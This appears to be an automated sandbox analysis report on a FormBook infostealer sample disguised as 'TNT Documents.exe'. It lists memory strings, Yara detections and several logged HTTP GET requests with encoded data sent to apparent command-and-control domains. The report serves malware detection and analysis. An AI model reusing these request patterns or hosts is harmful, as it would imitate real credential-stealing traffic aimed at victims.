Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/.comp
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/F
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/slnt
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/soft
Source: TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265384324.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265335700.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp | String found in binary or memory: http://www.monotype.
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comus4
          Source: TNT Documents.exe, 00000000.00000003.262108739.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262382693.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262663913.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262518900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262298913.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: TNT Documents.exe, 00000000.00000003.260239394.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comU
          Source: TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267332900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267369494.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264299140.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de2
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.der
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn9
          Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
          Source: unknownDNS traffic detected: queries for: www.cortepuroiberico.com
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1Host: www.cortepuroiberico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1Host: www.specialtyplastics.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.coached.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: TNT Documents.exe
          .NET source code contains very large strings
          Source: TNT Documents.exe, Form1.csLong String: Length: 22528
          Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.csLong String: Length: 22528
          Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.csLong String: Length: 22528
          Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.csLong String: Length: 22528
          Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.csLong String: Length: 22528
          Source: TNT Documents.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
